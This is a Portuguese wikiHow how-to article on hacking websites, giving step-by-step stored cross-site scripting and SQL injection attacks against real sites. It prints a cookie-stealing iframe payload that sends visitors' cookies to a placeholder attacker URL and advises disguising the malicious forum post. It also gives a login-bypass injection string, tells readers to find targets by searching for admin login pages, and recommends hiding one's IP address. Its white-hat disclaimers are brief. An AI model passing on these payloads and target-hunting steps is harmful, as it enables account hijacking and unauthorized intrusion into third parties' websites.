Como Hackear um Site

Baixe em PDF
Baixe em PDF

Atenção: este guia deve ser usado apenas para fins educacionais, seja para ajudar as pessoas a começar a aprender “hacks whitehat” [1] ou para ver como hackers trabalham a fim de melhor proteger seus próprios sites. Este tutorial dará os passos para ter acesso a diversos sites de BAIXO NÍVEL de segurança.

Método 1
Método 1 de 3:

Usando "Cross Site Scripting"

Baixe em PDF
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-460px-Hack-a-Website-Step-1-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-728px-Hack-a-Website-Step-1-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Um fórum é um bom exemplo. Lembre-se, se o site for seguro, este método não vai funcionar [2] .
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-460px-Hack-a-Website-Step-2-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-728px-Hack-a-Website-Step-2-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Você terá que digitar um código especial para o "post" que vai capturar os dados de todos os que clicarem sobre ele.
    • Você vai querer testar para ver se o sistema permite a publicação de códigos ou se os filtra. Digite <script...>alert(“teste”)</...script> (removendo o "..."). Se uma caixa de alerta aparecer quando você clica no seu post, o site está vulnerável a ataques.
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-460px-Hack-a-Website-Step-3-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-728px-Hack-a-Website-Step-3-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Crie e envie o seu “cookie catcher” [3] . O objetivo deste ataque é capturar os cookies de um usuário, que permite que você acesse sua conta neste site com vulnerabilidade no login. Você vai precisar de um “cookie catcher”, que irá capturar os cookies do seu alvo e redirecioná-lo. Faça o upload do “cookie catcher” em um site que tenha acesso e tenha suporte para PHP. Procurer por exemplos de “cookie catcher” na internet.
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-460px-Hack-a-Website-Step-4-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-728px-Hack-a-Website-Step-4-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Introduza um código adequado que irá capturar os cookies e enviá-los para o seu site. Você deve colocar algum texto após o código para disfarçar seu post e evitar que seja deletado.
    • Um código de exemplo ficaria assim <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location=”YOURURL/cookiecatcher.php?c=”+document.cookie)><.../iframe>(removendo os "...").
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-460px-Hack-a-Website-Step-5-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-728px-Hack-a-Website-Step-5-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Depois disso, você pode usar as informações dos cookies, que devem estar armazenados em seu site, para quaisquer fins que você precisar.
    Publicidade
Método 2
Método 2 de 3:

Realizando um “Injection Attack” [4]

Baixe em PDF
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-460px-Hack-a-Website-Step-6-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-728px-Hack-a-Website-Step-6-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Você terá que encontrar um site vulnerável, que tenha um login de administrador de fácil acesso. Pesquise no Google por “admin login.asp”.
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-460px-Hack-a-Website-Step-7-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-728px-Hack-a-Website-Step-7-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Digite admin como o nome de usuário e use alguns códigos conhecidos como a senha. Os mais comuns são 1' ou '1 '= '1.
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-460px-Hack-a-Website-Step-8-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-728px-Hack-a-Website-Step-8-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Este método exige um pouco de tentativa e erro.
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-460px-Hack-a-Website-Step-9-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-728px-Hack-a-Website-Step-9-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Eventualmente, encontrará a sequência que permite acesso de administrador para o site (se ele for um site vulnerável a ataques).
    Publicidade
Método 3
Método 3 de 3:

Preparando-se para o sucesso

Baixe em PDF
  1. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-460px-Hack-a-Website-Step-10-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-728px-Hack-a-Website-Step-10-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Se realmente quiser aprender a hackear sites, você precisa entender como os computadores e outras tecnologias funcionam. Aprenda a usar linguagens de programação como Python ou SQL, de modo que possa controlar melhor computadores e identificar vulnerabilidades em sistemas.
  2. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-460px-Hack-a-Website-Step-11-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-728px-Hack-a-Website-Step-11-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Você também precisa ter um bom conhecimento de HTML e javascript para hackear sites. Isso leva algum tempo para aprender, mas há inúmeras formas gratuitas de aprender HTML gratuitamente na internet.
  3. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-460px-Hack-a-Website-Step-12-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-728px-Hack-a-Website-Step-12-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    “Whitehats” são hacks usados para o bem, expondo as vulnerabilidades de segurança e tornam a Internet um lugar melhor para todos. Se quiser aprender a hackear, procure sempre usar seus conhecimentos para identificar brechas em sites para repassá-las às pessoas responsáveis para que possam consertar esses erros. Converse com hackers whitehats para aprender mais sobre essa linha de trabalho.
  4. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-460px-Hack-a-Website-Step-13-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-728px-Hack-a-Website-Step-13-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Se estiver aprendendo a hackear ou apenas se proteger, você precisará fazer muita pesquisa. Há muitas formas diferentes de vulnerabilidades e essa lista está sempre mudando, então você terá que se atualizar constantemente.
  5. {"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-460px-Hack-a-Website-Step-14-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-728px-Hack-a-Website-Step-14-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}
    Como a lista de hacks possíveis está em mudança constante, você precisa se manter atualizado constantemente. Só porque você está protegido para um determinado hack hoje, não significa que você estará seguro no futuro!
    Publicidade

Dicas

  • Visite os fóruns de hackers para aprender inúmeras dicas úteis.
Publicidade

Avisos

  • Hackear é ilegal. Se você for pego, a culpa é sua.
  • Se você estiver tentando hackear no mundo real, esconda seu endereço IP usando um sofware que criptografe sua conexão.
  • Se você ler este artigo, não se tornará imediatamente um hacker. Você deve explorar suas habilidades e praticar muito.
Publicidade

WikiHows Relacionados

Como
Fazer Parecer que Você Está Hackeando
Como
Exibir o Menu Secreto nas TVs da LG
Como
Fazer o Root de um Dispositivo Android sem PC Utilizando o Frameroot
Como
Ser Um Hacker
Como
Bloquear a Visão de uma Câmera de Segurança
Como
Hackear uma Conta GMail
Como Achar o Endereço IP de um Site: 6 Formas Fáceis
Como
Criar um Vírus
Como
Fazer uma Ligação Anônima
Como
Descobrir uma Senha
Como
Hackear WiFi com WPA ou WPA2 Usando o Kali Linux
Como Baixar e Jogar Roblox em um Chromebook Escolar
Publicidade

Referências

  1. https://www.techtarget.com/searchsecurity/definition/white-hat
  2. https://github.com/wireapp/wire-webapp/security/advisories/GHSA-jgv3-4j56-fvh
  3. https://www.hackingloops.com/cookies/
  4. https://www.invicti.com/blog/web-security/top-dangerous-injection-attacks/

Sobre este guia wikiHow

Em outras línguas
Esta página foi acessada 104 937 vezes.

Este artigo foi útil?

Publicidade